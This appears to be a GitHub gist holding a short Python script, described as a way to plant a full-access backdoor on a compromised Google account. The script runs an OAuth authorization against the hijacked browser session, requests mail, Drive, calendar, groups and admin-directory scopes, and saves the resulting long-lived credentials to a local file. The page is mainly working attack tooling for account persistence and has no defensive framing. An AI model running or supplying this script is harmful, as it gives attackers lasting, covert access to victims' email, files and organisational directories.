Skip to content

Instantly share code, notes, and snippets.

@ustayready
Last active October 12, 2022 06:21
Show Gist options
  • Save ustayready/e7e6011673b21471e359b0163a9321aa to your computer and use it in GitHub Desktop.
Save ustayready/e7e6011673b21471e359b0163a9321aa to your computer and use it in GitHub Desktop.
Quickly create a full-access backdoor on Google accounts by creating a Google API project at https://cloud.google.com/console, save the client_secrets.json into the same folder and then run the script below. It will print a URL for you to access with a browser that has the compromised Google account session active so you can authorize the applic…
#!/usr/bin/env python
import os
from oauth2client import client, tools
from oauth2client.file import Storage
SCOPES = 'https://www.googleapis.com/auth/calendar https://mail.google.com/ https://www.googleapis.com/auth/drive https://www.googleapis.com/auth/groups https://www.googleapis.com/auth/admin.directory.user'
def get_credentials():
credential_dir =os.getcwd()
client_secret_path = os.path.join(credential_dir, 'client_secrets.json')
saved_secret_path = os.path.join(credential_dir, 'saved_creds.json')
store = Storage(saved_secret_path)
credentials = store.get()
if not credentials or credentials.invalid:
flow = client.flow_from_clientsecrets(client_secret_path, SCOPES, redirect_uri='http://localhost')
url = flow.step1_get_authorize_url()
flags = tools.argparser.parse_args(args=[])
flags.noauth_local_webserver = True
credentials = tools.run_flow(flow, store, flags=flags)
return credentials
if __name__ == "__main__":
get_credentials()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment